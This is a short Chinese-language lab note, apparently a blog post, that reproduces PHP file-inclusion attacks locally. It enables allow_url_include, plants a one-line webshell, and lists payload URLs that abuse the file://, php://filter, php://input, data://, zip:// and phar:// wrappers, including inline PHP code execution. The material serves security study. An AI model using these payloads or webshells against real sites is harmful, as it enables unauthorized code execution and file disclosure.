文件包含PHP伪协议利用方法 本地复现

环境配置

步骤一:更改参数
php.ini ⾥有两个重要的参数 allow_url_fopen 、allow_url_include


步骤二:创建123.php文件输入一句话木马

步骤三:创建1.php

less-1 file://协议

123.php?cmd=file://D:\phpstudy_pro\WWW\1.php

less-2 php://filter协议


base解码

less-3 php://input协议

123.php?cmd=php://input利用burp抓包

更改传参方式

更改参数进行放包

less-4 data://

123.php?cmd=data:text/plain,<?php phpinfo();?>

less-5 zip://

创建2.txt文件进行压缩

123.php?cmd=zip://D:\phpstudy_pro\WWW\2.zip%232.txt

less-6 phar://

123.php?cmd=phar://D:\phpstudy_pro\WWW\2.zip\2.txt

相关推荐
chouchuang8 小时前
day-030-综合练习-笔记管理器
开发语言·笔记·python
云云只是个程序马喽8 小时前
海外短剧平台搭建方案:私有化源码系统选型|云微短剧系统技术架构拆解
java·php
云空9 小时前
《Three.js 3D实例大全》
开发语言·javascript·3d·three.js
techdashen9 小时前
Go 1.26 新增 `bytes.Buffer.Peek`:只看数据,不移动读取位置
开发语言·后端·golang
C137的本贾尼9 小时前
第七篇:消息队列(MQ)——就是个带存储的异步通信管道
java·开发语言·中间件
从零开始的代码生活_10 小时前
C++ list 原理与实践:双向链表、迭代器与简化实现
开发语言·c++·后端·学习·算法·链表·list
hy.z_77710 小时前
【C语言】11. 深入理解指针1
c语言·开发语言
charlie11451419110 小时前
现代C++工程实践——WeakPtr 第二关:核心骨架与控制块
开发语言·c++
ttwuai11 小时前
Go 后台接口 401/403 排查:JWT 过期、刷新请求和权限码怎么定位
开发语言·golang·状态模式
漫随流水12 小时前
Java——springboot web案例
java·开发语言·spring boot